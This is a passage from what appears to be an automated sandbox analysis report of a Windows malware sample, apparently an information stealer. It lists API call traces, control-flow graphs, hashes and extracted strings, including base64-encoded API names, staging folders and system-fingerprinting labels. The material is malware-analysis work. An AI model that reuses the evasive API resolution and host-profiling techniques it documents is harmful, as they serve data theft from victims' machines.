                                                                                                            • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041874E,?), ref: 0040660D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                                                                                                            • Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
                                                                                                            • Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                                                                                                            • Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757
                                                                                                            APIs
                                                                                                            • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,00600FEC,00000040,00600604,00000000,00000000,00000000,00000000,00000000), ref: 0060117B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706961497-0
                                                                                                            • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                            • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                                                                                            • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                            • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Directory$Create$AllocAttributesCurrentFileLibraryLoadString
                                                                                                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                                                                                                            • API String ID: 2652973473-1556614757
                                                                                                            • Opcode ID: 3cfc5a2fe20423dca8493bedaaafa9c7da5cfbada7a8914fee9239c54bc86b60
                                                                                                            • Instruction ID: 26d77c896aabed61a2775ccb06ba61d1ee422efe4d6d96ca95dbfc380ed6e43d
                                                                                                            • Opcode Fuzzy Hash: 3cfc5a2fe20423dca8493bedaaafa9c7da5cfbada7a8914fee9239c54bc86b60
                                                                                                            • Instruction Fuzzy Hash: DA91D9B06402049FD712EF69D885B9A37E8BF4A349F00847AF404EB7A6C778AD44CB5D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Directory$Create$AllocAttributesCurrentFileLibraryLoadString
                                                                                                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                                                                                                            • API String ID: 2652973473-1556614757
                                                                                                            • Opcode ID: 71ae6675639b850415fa3d4209e91d79375db806a0d3ef2ecf6f0eaec63e9857
                                                                                                            • Instruction ID: 5b3c55801863a32800eae0c5f30943bce4d4c5d0b2659c2e20ef893ba67f7cd3
                                                                                                            • Opcode Fuzzy Hash: 71ae6675639b850415fa3d4209e91d79375db806a0d3ef2ecf6f0eaec63e9857
                                                                                                            • Instruction Fuzzy Hash: A991E8B06402049FD711EF69D885F9A37E8BF49349F00847AB404EB7A6C778AD44CB9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?), ref: 004096BF
                                                                                                              • Part of subcall function 0040776C: GetFileAttributesW.KERNEL32(00000000,00000000,004077B8,?,0041CA58,?,?,004096E8,00000000,00000000,00000000,00409963,?,?,?,00000000), ref: 0040779A
                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6), ref: 0040970D
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?,00000000), ref: 00409741
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188E6,?,?,?), ref: 00409762
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097B6
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097D0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004097EA
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409804
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040981E
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409838
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409852
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040986C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00409886
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098A0
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004098BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Directory$Create$AllocAttributesCurrentFileLibraryLoadString
                                                                                                            • String ID: %TEMP%\2fda\$%appdata%\2fda\$PATH
                                                                                                            • API String ID: 2652973473-1556614757
                                                                                                            • Opcode ID: 8173c44f319da0c216b2bbaf86451febc78a6db65c083bc8c63ea26582f33096
                                                                                                            • Instruction ID: 26c99af69019636de113f168175dae5416f6f3cc59ad43c6f3cb6d4c520b39b5
                                                                                                            • Opcode Fuzzy Hash: 8173c44f319da0c216b2bbaf86451febc78a6db65c083bc8c63ea26582f33096
                                                                                                            • Instruction Fuzzy Hash: A191D7B06402049FD711EF69D885F9A77E8BF49349F00847AB404EB7A6C778AD44CB9D

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0041643A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416448
                                                                                                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,,?,Zone: ,?,00416CC4), ref: 004164C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll$`A
                                                                                                            • API String ID: 1927487376-3005690938
                                                                                                            • Opcode ID: cd77d7d78616101fb56a5fcd42693564515e67bc3a59ccfcd1055d7d514566b2
                                                                                                            • Instruction ID: 6248dc0f45d153d3d9923ca8400dc11361dccf40d7e1b6d03c7d8f30243dd753
                                                                                                            • Opcode Fuzzy Hash: cd77d7d78616101fb56a5fcd42693564515e67bc3a59ccfcd1055d7d514566b2
                                                                                                            • Instruction Fuzzy Hash: 0B9195709001199BCB10EF99C985ADEB7B9FF84304F5181BBE409B7291D739EF818B58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1034 4162ac-4163b3 call 4069a8 call 403990 LoadLibraryA GetProcAddress call 4069a8 call 403990 LoadLibraryA GetProcAddress call 4069a8 call 403990 call 4069a8 call 403990 LoadLibraryA GetProcAddress call 4034e4 CreateToolhelp32Snapshot 1053 4163b9-4163cf Process32FirstW 1034->1053 1054 41644a-416455 call 404648 1034->1054 1055 4163d1-41643e call 404648 call 404804 call 404648 * 2 Process32NextW 1053->1055 1056 416440-416448 CloseHandle 1053->1056 1061 416457-41645b 1054->1061 1062 4164c6-4164d9 GetCurrentProcessId call 404648 1054->1062 1055->1056 1056->1054 1063 41645d-41646c call 404648 1061->1063 1071 4165b2-4165e5 call 403508 call 4034e4 call 404810 1062->1071 1072 4164df-4164e3 1062->1072 1074 416495-4164a9 1063->1074 1075 41646e-41646f 1063->1075 1073 4164e5-4164f3 1072->1073 1079 4164f9-416503 1073->1079 1080 41659d-4165ac call 403538 1073->1080 1082 4164ab 1074->1082 1083 4164af-4164b3 1074->1083 1081 416471-41648b 1075->1081 1086 416505-41653c call 403760 call 403850 1079->1086 1087 41653e-416566 call 403760 1079->1087 1080->1071 1080->1073 1088 416491-416493 1081->1088 1089 41648d 1081->1089 1082->1083 1090 4164c0-4164c4 1083->1090 1091 4164b5-4164b8 1083->1091 1103 416570-416598 call 41610c call 403798 1086->1103 1087->1103 1104 41656b call 403850 1087->1104 1088->1074 1088->1081 1089->1088 1090->1062 1090->1063 1091->1090 1103->1080 1104->1103
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0041643A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416448
                                                                                                            • GetCurrentProcessId.KERNEL32(?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,,?,Zone: ,?,00416CC4), ref: 004164C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc$Process32$CloseCreateCurrentFirstHandleNextProcessSnapshotToolhelp32
                                                                                                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll$`A
                                                                                                            • API String ID: 1927487376-3005690938
                                                                                                            • Opcode ID: 14e5ced0ba24007a4855db43d0cb0c951dbf2c8692b9577dd878b027f5dc3c86
                                                                                                            • Instruction ID: 6a8f6cfc4904730716ef1b7fa223a98f4581e4ddaa420209d4ab18470a519fff
                                                                                                            • Opcode Fuzzy Hash: 14e5ced0ba24007a4855db43d0cb0c951dbf2c8692b9577dd878b027f5dc3c86
                                                                                                            • Instruction Fuzzy Hash: F28195709001199BCB10EF99C985ADEB7B9FF84304F5181BAE409B7291D739EF818B58

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 00416AF3
                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 00416B0A
                                                                                                              • Part of subcall function 004167B4: GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00415E64: GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4,?,Layouts: ,?), ref: 00416BBF
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                              • Part of subcall function 004162B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                              • Part of subcall function 004162B0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ), ref: 00416BE9
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,[Soft],?,00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416C08
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000002,00000000,00000000,00020019,0041A232,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416C15,00000001), ref: 004156A9
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 00415831
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000001,00000000,00000000,00020019,0041A232,0041A232,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 004159F4
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetrics$CreateFirstFreeInfoInformationProcess32SnapshotStringTimeToolhelp32Zone
                                                                                                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                            • API String ID: 2886010202-943277980
                                                                                                            • Opcode ID: cf3f118df456fbb21fa1facc159087a1725326ec374e31ca9e90b70e587c2f3d
                                                                                                            • Instruction ID: 8b9989462d4f4fef8a344be179faa2751249c1c0a2b7f31c48e03d76eef590b6
                                                                                                            • Opcode Fuzzy Hash: cf3f118df456fbb21fa1facc159087a1725326ec374e31ca9e90b70e587c2f3d
                                                                                                            • Instruction Fuzzy Hash: 3A813E70A00249ABDB01FFA1CC42BCDBB79EF45309F61807BB104B62D6D67DEA458B59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 00416AF3
                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 00416B0A
                                                                                                              • Part of subcall function 004167B4: GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00415E64: GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4,?,Layouts: ,?), ref: 00416BBF
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                              • Part of subcall function 004162B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                              • Part of subcall function 004162B0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ), ref: 00416BE9
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,[Soft],?,00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416C08
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000002,00000000,00000000,00020019,0041A232,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416C15,00000001), ref: 004156A9
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 00415831
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000001,00000000,00000000,00020019,0041A232,0041A232,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 004159F4
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetrics$CreateFirstFreeInfoInformationProcess32SnapshotStringTimeToolhelp32Zone
                                                                                                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                            • API String ID: 2886010202-943277980
                                                                                                            • Opcode ID: dd272a6e7e326a465c40a1b41d4886bd76584f821fbfe7aab4bf96d3cbfaee75
                                                                                                            • Instruction ID: 251d5a466214097b699f1fc24ce8194d4575742f71ae0e2f32c3f29d8f454955
                                                                                                            • Opcode Fuzzy Hash: dd272a6e7e326a465c40a1b41d4886bd76584f821fbfe7aab4bf96d3cbfaee75
                                                                                                            • Instruction Fuzzy Hash: 17812E70A00209ABDB01FFA1CC42BCDBB79EF45309F61807BB104B62D6D67DEA458B59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 00416AF3
                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 00416B0A
                                                                                                              • Part of subcall function 004167B4: GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
